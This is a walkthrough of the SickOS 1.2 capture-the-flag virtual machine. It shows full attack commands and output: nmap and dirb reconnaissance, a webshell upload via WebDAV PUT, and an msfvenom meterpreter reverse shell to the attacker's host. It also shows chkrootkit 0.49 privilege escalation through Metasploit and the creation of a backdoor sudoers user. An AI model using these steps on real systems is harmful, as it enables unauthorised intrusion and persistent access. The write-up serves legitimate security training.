SickOS 1.2 Writeup


So, today we are doing the SickOS1.2 vulnerable vm.

To begin with, we start with a service scan on the target host.

[email protected]:~# nmap -v -A -T4 -sV -p- 192.168.1.67
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 00:54 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:54
Completed NSE at 00:54, 0.00s elapsed
Initiating NSE at 00:54
Completed NSE at 00:54, 0.00s elapsed
Initiating ARP Ping Scan at 00:54
Scanning 192.168.1.67 [1 port]
Completed ARP Ping Scan at 00:54, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:54
Completed Parallel DNS resolution of 1 host. at 00:54, 0.00s elapsed
Initiating SYN Stealth Scan at 00:54
Scanning ubuntu.lan (192.168.1.67) [65535 ports]
Discovered open port 80/tcp on 192.168.1.67
Discovered open port 22/tcp on 192.168.1.67
SYN Stealth Scan Timing: About 23.04% done; ETC: 00:56 (0:01:44 remaining)
SYN Stealth Scan Timing: About 59.00% done; ETC: 00:56 (0:00:42 remaining)
Completed SYN Stealth Scan at 00:56, 88.50s elapsed (65535 total ports)
Initiating Service scan at 00:56
Scanning 2 services on ubuntu.lan (192.168.1.67)
Completed Service scan at 00:56, 6.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against ubuntu.lan (192.168.1.67)
NSE: Script scanning 192.168.1.67.
Initiating NSE at 00:56
Completed NSE at 00:56, 2.58s elapsed
Initiating NSE at 00:56
Completed NSE at 00:56, 0.00s elapsed
Nmap scan report for ubuntu.lan (192.168.1.67)
Host is up (0.0015s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:D0:84:59 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4
Uptime guess: 0.008 days (since Sun May  1 00:44:39 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.51 ms ubuntu.lan (192.168.1.67)

NSE: Script Post-scanning.
Initiating NSE at 00:56
Completed NSE at 00:56, 0.00s elapsed
Initiating NSE at 00:56
Completed NSE at 00:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.64 seconds
           Raw packets sent: 131178 (5.774MB) | Rcvd: 80 (3.600KB)

So we got port 22 and 80 open. Let's take a look at SSH first:

[email protected]:~# ssh 192.168.1.67
The authenticity of host '192.168.1.67 (192.168.1.67)' can't be established.
ECDSA key fingerprint is SHA256:jltI6lCnaj6Ef0DsVMo1PVZCPyfw1MAba7V9x4mpECc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.67' (ECDSA) to the list of known hosts.
 .oooooo..o  o8o            oooo          .oooooo.                 .o        .oooo.  
d8P'    `Y8  `"'            `888         d8P'  `Y8b              o888      .dP""Y88b 
Y88bo.      oooo   .ooooo.   888  oooo  888      888  .oooo.o     888            ]8P'
 `"Y8888o.  `888  d88' `"Y8  888 .8P'   888      888 d88(  "8     888          .d8P' 
     `"Y88b  888  888        888888.    888      888 `"Y88b.      888        .dP'    
oo     .d8P  888  888   .o8  888 `88b.  `88b    d88' o.  )88b     888  .o. .oP     .o
8""88888P'  o888o `Y8bod8P' o888o o888o  `Y8bood8P'  8""888P'    o888o Y8P 8888888888
                                                                                     
        By @D4rk36
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 

Nothing special here. Just a nice banner of the vm and the fact that root login is not permitted.
So we move on to port 80:

By navigating with a browser, we only get an image.

Nothing special in the source code of the page too. So let's check for any other interesting directories:

[email protected]:~# dirb http://192.168.1.67

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May  1 12:05:48 2016
URL_BASE: http://192.168.1.67/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.67/ ----
+ http://192.168.1.67/index.php (CODE:200|SIZE:163)                                                                                          
==> DIRECTORY: http://192.168.1.67/test/                                                                                                     
                                                                                                                                             
---- Entering directory: http://192.168.1.67/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun May  1 12:05:57 2016
DOWNLOADED: 4612 - FOUND: 1

So we got a "test" directory. By opening it in a browser we see it's listable and empty. I fire up nikto to see if it can find anything useful, but no luck. Also, I tried bigger wordlists but there is nothing more than what we already know.
At this point since we know that we are dealing with lighttpd 1.4.28 I start looking for any exploits but come out empty handed. Since nothing really useful has come up until now, I decide to launch w3af for a full scan and see what that gets me. The options are:


We let w3af do its magic and report back to as in html form so that the outcome is easier to read. Inside report.html we come across with a high vulnerability. The server supports DAV methods and more specifically directory "/test" is publicly writable!


Indeed w3af managed to upload a file using the PUT  HTTP method. So it's time to upload a shell for ourselves in there. My favourite is B374K webshell. To upload it, I utilize "Poster" Firefox extension which let's you manipulate requests and send whatever the hell you want to the server. After telling Poster where to upload, what method to get, and giving it the file to upload we hit the big green button and vuala!


So we got ourselves a shell. It's time to try and escalate my privileges but that to happen...enumerate enumerate enumerate...


At this point I spent quite some time, looking around for interesting directories, the home of user John etc etc. For a couple of hours I was coming up empty handed since the usual kernel exploits don't work and there is nothing really obvious to get me going.

Furthermore, I seem unable to start a reverse shell from there. Perhaps there is something blocking outound connections apart from certain ports.

With my webshell in place I start following g0tmi1k's steps in order to fingerprint the server as best as I can, and make sure I don't leave something out. After some time had passed, I came across a chkrootkit job inside /etc/cron.daily, but wait, chkrootkit is outdated.

/var/www/test/>ls -l /etc/cron.daily
total 60
-rwxr-xr-x 1 root root 15399 Nov 15  2013 apt
-rwxr-xr-x 1 root root   314 Apr 18  2013 aptitude
-rwxr-xr-x 1 root root   502 Mar 31  2012 bsdmainutils
-rwxr-xr-x 1 root root  2032 Jun  4  2014 chkrootkit
-rwxr-xr-x 1 root root   256 Oct 14  2013 dpkg
-rwxr-xr-x 1 root root   338 Dec 20  2011 lighttpd
-rwxr-xr-x 1 root root   372 Oct  4  2011 logrotate
-rwxr-xr-x 1 root root  1365 Dec 28  2012 man-db
-rwxr-xr-x 1 root root   606 Aug 17  2011 mlocate
-rwxr-xr-x 1 root root   249 Sep 12  2012 passwd
-rwxr-xr-x 1 root root  2417 Jul  1  2011 popularity-contest
-rwxr-xr-x 1 root root  2947 Jun 19  2012 standard

/var/www/test/>chkrootkit -V
chkrootkit version 0.49

So back in my kali box, I look for an exploit for this case.

[email protected]:~# searchsploit chkrootkit
----------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                             |  Path
                                                                                                           | (/usr/share/exploitdb/platforms)
----------------------------------------------------------------------------------------------------------- ----------------------------------
chkrootkit 0.49 - Local Root Vulnerability                                                                 | ./linux/local/33899.txt
Chkrootkit - Local Privilege Escalation                                                                    | ./linux/local/38775.rb
----------------------------------------------------------------------------------------------------------- ----------------------------------
[email protected]:~#

The first one is the exploit's description, and the second one is the exploit itself that exists in metasploit as well.

In order to use metasploit's local privilege escalation I first need a sell. So let's creat a little payload with msfvenom and upload it to the webserver in order to get our meterpreter shell and then escalate with that.

Oh wait, as I said earlier, there seems to be something blocking our reverse connections from the box. I start trying different ports with a local netcat listener, and from the webshell I try to connect to many known ports. 23, 25, 80, 443, 445 etc. I succeed and get successful reverse connections through ports 443 and 8080!

 So it's time for msfvenom:

[email protected]:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.96 LPORT=443 -f elf > venom.elf
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 71 bytes

Now that venom.elf is ready, we need to upload it to the target and make it executable.


So now we are ready to run it and get the reverse shell. But first, let's start the handler for it. In my boxe's msfconsole:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST 192.168.1.96
LHOST => 192.168.1.96
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.96:443 
[*] Starting the payload handler..

and from the webshell inside the target:

./venom.elf

As expected, we got the meterpreter session. Once we get that session, we need to send it to the background, prepare another exploit to be used for local privilege escalation, and have another listener for the (hopefully) root session to come back to us. We will use the exploit we found earlier about chkrootkit and the handler will be listening on port 8080 since I verified that connections to that port can come out of the target.

[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.1.67
[*] Meterpreter session 1 opened (192.168.1.96:443 -> 192.168.1.67:49834) at 2016-05-01 15:49:00 +0300

meterpreter > background
[*] Backgrounding session 1...

msf exploit(handler) > use exploit/unix/local/chkrootkit 
msf exploit(chkrootkit) > set SESSION 1
SESSION => 1
msf exploit(chkrootkit) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(chkrootkit) > set LHOST 192.168.1.96
LHOST => 192.168.1.96
msf exploit(chkrootkit) > set LPORT 8080
LPORT => 8080
msf exploit(chkrootkit) > exploit
[*] Exploit completed, but no session was created.

[*] Started reverse TCP double handler on 192.168.1.96:8080 
[!] Rooting depends on the crontab (this could take a while)
msf exploit(chkrootkit) > [*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sFPWOccQJzT4nJuh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sFPWOccQJzT4nJuh\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.96:8080 -> 192.168.1.67:52923) at 2016-05-01 16:08:36 +0300
[+] Deleted /tmp/update

msf exploit(chkrootkit) > sessions -l

Active sessions
===============

  Id  Type                   Information                                                  Connection
  --  ----                   -----------                                                  ----------
  1   meterpreter x86/linux  uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ ubuntu  192.168.1.96:443 -> 192.168.1.67:49834 (192.168.1.67)
  2   shell unix                                                                          192.168.1.96:8080 -> 192.168.1.67:52923 (192.168.1.67)

The exploitation was successful and gave us a new session on port 8080. When the time came, the cronjob was executed and since chkrootkit runs as root, the shell it gave me should be just that. A root shell.
Let's see what we got and interact with it a bit.

msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...

3977804244
KPiyTBiRHTsvMuUmeXsQndXDhBcrHAKI
true
JlHAtTHcMJJYrkNtRNOvyQnWPxjYqEPu
QMCBOTJjPfkZTvmOdIAvxVzPDEcZlOoM
yHWkldXZAvCqLzywLibaXujYegMMSVzK
whoami
root
/usr/sbin/useradd gknsb
passwd gknsb
Enter new UNIX password: r00ted
Retype new UNIX password: r00ted
passwd: password updated successfully
echo "gknsb ALL=(ALL:ALL) ALL" >> /etc/sudoers

Aaand we are in! We also got ourselves a brand new user with full access to the system. Let's connect via SSH and get our flag.

[email protected]:~# ssh [email protected]
 .oooooo..o  o8o            oooo          .oooooo.                 .o        .oooo.  
d8P'    `Y8  `"'            `888         d8P'  `Y8b              o888      .dP""Y88b 
Y88bo.      oooo   .ooooo.   888  oooo  888      888  .oooo.o     888            ]8P'
 `"Y8888o.  `888  d88' `"Y8  888 .8P'   888      888 d88(  "8     888          .d8P' 
     `"Y88b  888  888        888888.    888      888 `"Y88b.      888        .dP'    
oo     .d8P  888  888   .o8  888 `88b.  `88b    d88' o.  )88b     888  .o. .oP     .o
8""88888P'  o888o `Y8bod8P' o888o o888o  `Y8bood8P'  8""888P'    o888o Y8P 8888888888
                                                                                     
        By @D4rk36
[email protected]'s password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '14.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sun May  1 06:29:30 2016 from 192.168.1.96
Could not chdir to home directory /home/gknsb: No such file or directory
$ sudo su -
[sudo] password for gknsb: 
[email protected]:~# ls -l
total 52
-rw-r--r-- 1 root root 39421 Apr  9  2015 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
-r-------- 1 root root   491 Apr 26 03:58 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
drwxr-xr-x 2 john john  4096 Apr 12 08:42 chkrootkit-0.49
-rw-r--r-- 1 root root   541 Apr 25 22:48 newRule
[email protected]:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt 
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

As a plus, I decided to check what was blocking my reverse connections from the victem to my box.

[email protected]:~# iptables -L
Chain INPUT (policy DROP)
target     prot opt source               destination         
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ssh
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:http-alt
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:https

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy DROP)
target     prot opt source               destination         
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:ssh
ACCEPT     tcp  --  anywhere             anywhere             tcp spt:http
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http-alt
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:https
[email protected]:~# cat newRule 
# Generated by iptables-save v1.4.12 on Mon Apr 25 22:48:24 2016
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 443 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
# Completed on Mon Apr 25 22:48:24 2016

There we have it. IPtables rules that block outbound connections (since that is the default behaviour) and only accept outbound connections on ports 8080 and 443 as destination ports.

I would like to thank D4rk36 for creating this vm and Vulnhub for hosting it. You guys are doing a great job. Thanks for the entertainment and fun with these vms. Cheers!

Comments